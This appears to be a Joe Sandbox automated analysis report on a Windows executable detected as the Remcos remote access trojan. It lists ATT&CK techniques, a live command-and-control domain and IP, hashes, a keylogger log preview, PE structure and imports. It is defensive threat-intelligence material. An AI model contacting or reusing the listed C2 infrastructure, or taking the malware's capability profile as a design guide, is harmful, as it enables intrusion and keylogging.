                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		1
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services11
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts12
                          Command and Scripting Interpreter                          		1
                          Windows Service                          		1
                          Bypass User Account Control                          		2
                          Obfuscated Files or Information                          		211
                          Input Capture                          		1
                          Account Discovery                          		Remote Desktop Protocol211
                          Input Capture                          		2
                          Encrypted Channel                          		Exfiltration Over Bluetooth1
                          Defacement
                          Email AddressesDNS ServerDomain Accounts2
                          Service Execution                          		Logon Script (Windows)1
                          Access Token Manipulation                          		1
                          DLL Side-Loading                          		2
                          Credentials In Files                          		1
                          System Service Discovery                          		SMB/Windows Admin Shares3
                          Clipboard Data                          		1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          Windows Service                          		1
                          Bypass User Account Control                          		NTDS2
                          File and Directory Discovery                          		Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                          Process Injection                          		1
                          Masquerading                          		LSA Secrets23
                          System Information Discovery                          		SSHKeylogging22
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials21
                          Security Software Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Access Token Manipulation                          		DCSync1
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                          Process Injection                          		Proc Filesystem2
                          Process Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          Application Window Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                          System Owner/User Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe84%ReversingLabsWin32.Backdoor.Remcos
                          17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe100%AviraBDS/Backdoor.Gen
                          17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe100%Joe Sandbox ML

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://geoplugin.net/json.gp0%URL Reputationsafe
                          http://geoplugin.net/json.gp/C0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          embargogo237.duckdns.org
                          		94.103.125.196
                          		truetrue
                            		unknown
                            geoplugin.net
                            		178.237.33.50
                            		truefalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://geoplugin.net/json.gpfalse
                              • URL Reputation: safe
                              		unknown
                              embargogo237.duckdns.orgtrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://geoplugin.net/json.gpX17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://geoplugin.net/json.gp617290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://geoplugin.net/json.gpU_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://geoplugin.net/17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://geoplugin.net/json.gp%17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://geoplugin.net/json.gp/C17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exefalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://geoplugin.net/json.gpSystem3217290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            94.103.125.196
                                            		embargogo237.duckdns.orgGermany
                                            		24904KWAOOK-NETSARLFRtrue
                                            178.237.33.50
                                            		geoplugin.netNetherlands
                                            		8455ATOM86-ASATOM86NLfalse

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1535239
                                            Start date and time:2024-10-16 18:49:10 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 45s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:4
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                            Detection:MAL
                                            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 39
                                            • Number of non-executed functions: 237
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240s for sample files taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:50:47API Interceptor6661108x Sleep call for process: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            178.237.33.50ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            MARSS-FILTRY_ZW015010024.batGet hashmaliciousRemcos, GuLoaderBrowse
                                            • geoplugin.net/json.gp
                                            SecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • geoplugin.net/json.gp
                                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            embargogo237.duckdns.orgxCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
                                            • 185.29.11.23
                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                            • 45.74.19.121
                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 45.74.19.121
                                            geoplugin.netge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            MARSS-FILTRY_ZW015010024.batGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            SecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                            • 178.237.33.50
                                            Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ATOM86-ASATOM86NLge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            MARSS-FILTRY_ZW015010024.batGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            SecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                            • 178.237.33.50
                                            Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            KWAOOK-NETSARLFRr3DGQXicwA.exeGet hashmaliciousLummaC, RedLineBrowse
                                            • 94.103.125.119
                                            r3DGQXicwA.exeGet hashmaliciousLummaC, MicroClip, RedLineBrowse
                                            • 94.103.125.119
                                            skt.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 81.28.195.134
                                            wRxSDEgnTy.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.103.124.89
                                            C8wkUXBAZm.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.103.124.89
                                            b3CaTUFeSZ.elfGet hashmaliciousMirai, GafgytBrowse
                                            • 81.28.195.186
                                            LBVJ3OoBHX.elfGet hashmaliciousMiraiBrowse
                                            • 194.147.21.127
                                            HpUy6OymcM.elfGet hashmaliciousUnknownBrowse
                                            • 45.15.62.129
                                            ZgSQ1wUeNR.elfGet hashmaliciousMiraiBrowse
                                            • 81.28.195.135
                                            24na4fnD86.elfGet hashmaliciousGafgytBrowse
                                            • 94.103.124.162

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\remcos\logs.dat

                                            Download File
                                            Process:C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):144
                                            Entropy (8bit):3.3603882199736725
                                            Encrypted:false
                                            SSDEEP:3:rhlKlM+UlTlfUl1fKlnx5JWRal2Jl+7R0DAlBG45klovDl6v:6lyDUl1Clx5YcIeeDAlOWAv
                                            MD5:55006D7DD014744B74455D7B1D217086
                                            SHA1:EDFC5F730C62865CB2EBFF49B5B3F773062F048A
                                            SHA-256:6BFC4F944BC49FE413FF2192BD817C774E0BBD9B3DF338318F0384CC339D55BB
                                            SHA-512:306BDC44D0E17473BA5E31BDB87ED3326896EAD0452C47749CF4ABF624514F18AA8739588B21ED2CBE8B0501E1FA4CF8B1AFB6C639190AF593463B12B1410BC7
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                            Reputation:low
                                            Preview:....[.2.0.2.4./.1.0./.1.6. .1.2.:.5.0.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                            Download File
                                            Process:C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):956
                                            Entropy (8bit):5.016616617248742
                                            Encrypted:false
                                            SSDEEP:12:tkTLJend66GkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkwV:qpSdbauKyGX85MEBZvXhNlT3/7l1DYro
                                            MD5:1E4FEE0935CFE037E19938E3CD301E95
                                            SHA1:E82413E19E9452DD76756D4573752CD97A88EBA1
                                            SHA-256:F9E4D3EC4F8C549EB34DD1A6E88463F20A6A4AF073B00933281546452C025A42
                                            SHA-512:1422E40D1592516B08D53AE62D98C71CC3C319D9A606234BC1DDF8D16CF9CFD2C0D75921F2E68B6DB8C260DCD5B35C6F80070611170CE741EA872EA993AD3EB2
                                            Malicious:false
                                            Reputation:low
                                            Preview:{. "geoplugin_request":"155.94.241.186",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.601389087591468
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                            File size:494'592 bytes
                                            MD5:3904babb53d5bbdab7e0785a533a58d7
                                            SHA1:ce1f658c4fec558cd65698c766363f06c876bdbd
                                            SHA256:73710268628b6e68182c360fb53dc6475b31dacd9f46d05e98c0830019b075aa
                                            SHA512:df691df5c7ac7571d0838065f5bbf088133d690c192dd2b96165e558bc9685a2db8d6946a1e8c3078f1fe96c9f6d9d2dc1a996c7b58b294050cf592dbcb5f52c
                                            SSDEEP:6144:oTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZXAXkcrHT4:oTlrYw1RUh3NFn+N5WfIQIjbs/ZXMT4
                                            TLSH:14B49E01BAD1C072D57514300D3AF776EAB8BD201835497B73EA1D5BFE31190A72AAB7
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~...~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..

                                            File Icon

                                            Icon Hash:95694d05214c1b33

                                            Static PE Info

                                            General

                                            Entrypoint:0x434a80
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66F18049 [Mon Sep 23 14:50:49 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:1389569a3a39186f3eb453b501cfe688

                                            Entrypoint Preview

                                            Instruction
                                            call 00007FE42481054Bh
                                            jmp 00007FE42480FF93h
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000324h
                                            push ebx
                                            push esi
                                            push 00000017h
                                            call 00007FE4248327E3h
                                            test eax, eax
                                            je 00007FE424810107h
                                            mov ecx, dword ptr [ebp+08h]
                                            int 29h
                                            xor esi, esi
                                            lea eax, dword ptr [ebp-00000324h]
                                            push 000002CCh
                                            push esi
                                            push eax
                                            mov dword ptr [00471D14h], esi
                                            call 00007FE424812556h
                                            add esp, 0Ch
                                            mov dword ptr [ebp-00000274h], eax
                                            mov dword ptr [ebp-00000278h], ecx
                                            mov dword ptr [ebp-0000027Ch], edx
                                            mov dword ptr [ebp-00000280h], ebx
                                            mov dword ptr [ebp-00000284h], esi
                                            mov dword ptr [ebp-00000288h], edi
                                            mov word ptr [ebp-0000025Ch], ss
                                            mov word ptr [ebp-00000268h], cs
                                            mov word ptr [ebp-0000028Ch], ds
                                            mov word ptr [ebp-00000290h], es
                                            mov word ptr [ebp-00000294h], fs
                                            mov word ptr [ebp-00000298h], gs
                                            pushfd
                                            pop dword ptr [ebp-00000264h]
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [ebp-0000026Ch], eax
                                            lea eax, dword ptr [ebp+04h]
                                            mov dword ptr [ebp-00000260h], eax
                                            mov dword ptr [ebp-00000324h], 00010001h
                                            mov eax, dword ptr [eax-04h]
                                            push 00000050h
                                            mov dword ptr [ebp-00000270h], eax
                                            lea eax, dword ptr [ebp-58h]
                                            push esi
                                            push eax
                                            call 00007FE4248124CDh

                                            Rich Headers

                                            Programming Language:
                                            • [C++] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6eeb80x104.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x790000x4b4c.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x3bc8.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x6d3500x38.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x6d3e40x18.rdata
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6d3880x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x590000x500.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x571f50x57200e504ab64b98631753dc227346d757c52False0.5716379348995696data6.6273936921798455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x590000x179dc0x17a0003563836e8ba6bd75dd82177f19b0089False0.5008370535714286data5.862029025853186IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x710000x5d440xe000eaccffe1cb836994ce5d3ccfb22d4f9False0.22126116071428573data3.0035180736120775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .tls0x770000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .gfids0x780000x2300x4009ca325bce9f8c0342c0381814603584aFalse0.330078125data2.3999762503719224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .rsrc0x790000x4b4c0x4c007754b1bf51c13b80c6011606b2b45e44False0.2836657072368421data3.986078171580293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x7e0000x3bc80x3c00047d13d1dd0f82094cdf10f08253441eFalse0.7640625data6.723768218094163IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x7918c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                            RT_ICON0x795f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                            RT_ICON0x79f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                            RT_ICON0x7b0240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                            RT_RCDATA0x7d5cc0x540data1.0081845238095237
                                            RT_GROUP_ICON0x7db0c0x3edataEnglishUnited States0.8064516129032258

                                            Imports

                                            DLLImport
                                            KERNEL32.dllFindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
